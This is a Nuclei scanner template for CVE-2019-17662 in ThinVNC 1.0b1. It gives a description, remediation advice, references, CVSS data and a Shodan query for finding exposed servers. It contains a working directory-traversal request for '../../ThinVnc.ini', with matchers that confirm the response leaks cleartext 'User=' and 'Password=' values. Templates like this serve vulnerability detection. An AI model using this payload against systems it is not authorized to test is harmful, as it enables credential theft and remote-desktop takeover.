id: CVE-2019-17662

info:
  name: ThinVNC 1.0b1 - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
  remediation: |
    Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms.
  reference:
    - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html
    - https://github.com/bewest/thinvnc/issues/5
    - https://redteamzone.com/ThinVNC/
    - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-17662
    cwe-id: CWE-22
    epss-score: 0.52352
    epss-percentile: 0.97243
    cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cybelsoft
    product: thinvnc
    shodan-query: http.favicon.hash:-1414548363
  tags: packetstorm,cve,cve2019,auth-bypass,thinvnc,intrusive

http:
  - raw:
      - |
        GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "User="
          - "Password="
        condition: and

      - type: word
        part: header
        words:
          - "application/binary"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a173eb2e6fea90b3a075740734fa3c7cc44fee1379273fd1565419dd4ca613bb022100d6873c95b74fb4a5c643e11337f2adf012af415953693119b01a3d9cdbacade1:922c64590222798bb761d5b6d8e72950